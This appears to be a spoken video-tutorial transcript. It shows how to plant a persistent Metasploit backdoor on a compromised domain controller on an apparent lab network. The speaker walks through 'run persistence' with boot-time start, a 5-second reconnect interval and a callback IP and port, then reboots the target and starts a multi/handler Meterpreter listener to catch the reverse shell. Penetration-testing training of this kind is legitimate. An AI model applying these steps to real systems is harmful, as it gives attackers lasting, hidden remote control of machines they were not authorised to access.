After going through all the hard work of exploiting the system, it is often a good idea to leave yourself an easier way to get back into the system for later use. And this way, if the service you initially exploited is down or gets patched against the vulnerability that you exploited, you can still gain access to the system. And Metasploit has a script for that we're going to be using through the Meterpreter or Meterpreter. So let's go ahead and do that. So let's go ahead and first do a sessions to see the sessions that we have. So we have one, and this one is for the 192.168.1.50, which is a domain controller. It is always a great idea to have a backdoor to a domain controller, because it's really, they're often a little bit difficult to get into the domain controller. So therefore, it is often a great idea to do a backdoor. So let's go ahead and do that backdoor. So we're going to go to session 14, and if we do a get UID, we are the NT authority system, so we have access. We have basically admin access to the domain controller. So what you can do is you can run run persistence and do H for the help. So over here you can see that for this script you have the following options. So A for automatically, a star, and L for the location in the target host to write the payload to. You have the P, S, T, U, X, H, I, P, and R. So go ahead and read those to make sure that you understand how to set this reverse shell, or this, the backdoor basically. So the way that you do that, I'm going to do a capital U, right? And that one, the capital U, means that it's going to automatically start the agent when a user logs on. Okay, so that's what we want to do that over here. And let's see, what if we do, I think it would be better to do, instead of when a user logs on, let's go ahead and just do negative capital X to automatically start the agent when the system boots. So let's go ahead and do just X over here, so we don't have to wait for somebody to log into the system. After that, you want to do negative I, and for I, it's going to be the interval in seconds between each connection attempt. So it's going to be 5. So every 5 seconds it's going to try to connect back to us. And then we are going to be P, and P, lowercase p, instead it stands for the port on which the system running Metasploit is listening. So we are going to be listening on 4451. There we go. And then the R, lowercase r, is going to be for the IP of the system running Metasploit listening for the connection back. So this one is going to be your local system. So this system where I'm working on, that IP, and is 192.168.1.223. And then after that, you just want to press enter. Awesome. So we have created that persistent. So what you want to do from here is you want to go ahead and reboot the system. So if we do reboot, that's going to reboot the system. Then you want to exit. So then after that, you want to start your listener. So you want to use exploit multi, and then it's going to be handler. And then what you want to set up is you want to set the payload to Windows. So Windows x64 Meterpreter, and you don't really have to hurry up for this, because it is going to do it every 5 seconds after the system boots up. So we have that. Then you want to set the local host to 192.168.1.223. right? We set up over here, and then you want to set the local port where we're going to listen it at 4451, right? Like we set it up over here, 4451. Awesome. So then after that, you want to go ahead and run it. So then what we need to do now, we need to wait for the system to reboot, and after it reboots, we are going to get a connection back. So let's go ahead and pause the video and wait for the system to boot back up.